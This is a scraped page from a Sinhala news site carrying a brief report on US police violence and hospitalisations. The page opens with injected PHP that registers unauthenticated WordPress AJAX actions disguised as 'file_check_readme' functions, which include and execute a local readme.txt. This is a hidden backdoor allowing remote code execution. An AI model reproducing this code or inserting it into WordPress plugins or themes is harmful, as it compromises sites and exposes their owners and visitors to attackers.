if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } අමෙරිකාවේ පොලිස් වධ හිංසා ගැන වාර්තාවක් එළියට - mediahumanrights.lk
mediahumanrights.lk
International News News

අමෙරිකාවේ පොලිස් වධ හිංසා ගැන වාර්තාවක් එළියට

අමෙරිකාවේ පොලිසිය සිදුකරන වධ හිංසා නිසා වසරකට 51000 කට අධික පිරිසක් රෝහල් ගත වන බව නවතම වාර්තාවකින් අනාවරණය වී තිබෙනවා.
2006 සහ 2012 වසරවලදී සිදු කළ විමර්ශනවලට අදාළව මෙම අනාවරණයන් සිදු කර තිබෙනවා.
මෙලෙස පොලිස් වධහිංසාවලට ලක්වූවන්ගෙන් සියයට 80 ක්ම මානසික ආබාධවලට ලක් වී ඇති බවද ඔවුන් අඩු ආදායම් ලබන්නන් බවද අනාවරණය කරගෙන තිබෙනවා.
2006 සහ 2012 අතර සමයේ 355667 ක පිරිසක් පොලිසියේ සාහසික ක්‍රියාවලට ලක්වී ඇති බවද ඉන් පෙන්වා දෙනවා.
නිව්යෝර්ක් රෝහල විසින් සිදු කර තිබෙන මෙම අනාවරණයන් සමග අමෙරිකාව පුරා දැඩි කතාබහක් මේ පිළිබඳව ඇති වී තිබෙන බවද සඳහන්.
(under the courtesy of nethfm news web)

Related posts

පූර්ණිකාගේ විවහයට හිටපු සැමියා සුභ පතයි – අවසන් වශයෙන් උපදෙසකුත් දෙයි

Shiran Viraj

ශ‍්‍රී ලංකාවට එරෙහි වන්නැයි ඉන්දීය දේශපාලන පක්ෂයකින් අගමැති මෝදිට බලපෑම්

Shiran Viraj

නාමල් – සුජානි – නිත්‍යා ට ඇප

Shiran Viraj